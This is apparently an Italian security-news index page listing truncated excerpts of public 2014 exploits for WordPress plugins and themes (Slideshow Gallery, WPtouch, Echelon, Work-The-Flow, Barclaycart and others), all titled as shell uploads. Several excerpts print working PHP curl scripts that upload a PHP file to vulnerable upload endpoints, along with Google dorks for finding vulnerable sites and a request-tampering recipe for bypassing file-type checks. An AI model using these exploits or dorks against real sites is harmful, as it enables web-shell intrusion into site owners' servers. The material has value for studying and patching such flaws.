WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

WordPress cnhk-slideshow Shell Upload

19 maggio 2014 - Fonte: http://www.mondounix.com
...

Leggi il seguito »

WordPress Echelon Theme Shell Upload

1 maggio 2014 - Fonte: http://www.mondounix.com
# Exploit Author:Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com 
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/
 
 
 
 
#Exploit :
==========
 
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
 
=========
 
Shell Access:...

Leggi il seguito »

WordPress Work-The-Flow 1.2.1 Shell Upload

30 aprile 2014 - Fonte: http://www.mondounix.com
# Author: nopesled
# Date: 24/04/14
# Software: https://wordpress.org/plugins/work-the-flow-file-upload/
# Company: http://wtf-fu.com/
# Version: 1.2.1
# Tested on: Windows 7
# Vulnerability: Unrestricted File Upload
 
 
Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php
 
By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP.
 
Append '|php':
 
- ----------------------------123456789123456\r\n
Content-Disposition: form-data; name="accept_file_types"\r\n
\r\n
jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n
 
 
Now change the extension in the data for 'filename' to '.php' and enter...

Leggi il seguito »

WordPress Business Intelligence 1.0.6 Shell Upload

31 marzo 2014 - Fonte: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Barclaycart Shell Upload

10 marzo 2014 - Fonte: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Leggi il seguito »

WordPress Premium Gallery Manager Shell Upload

8 marzo 2014 - Fonte: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Leggi il seguito »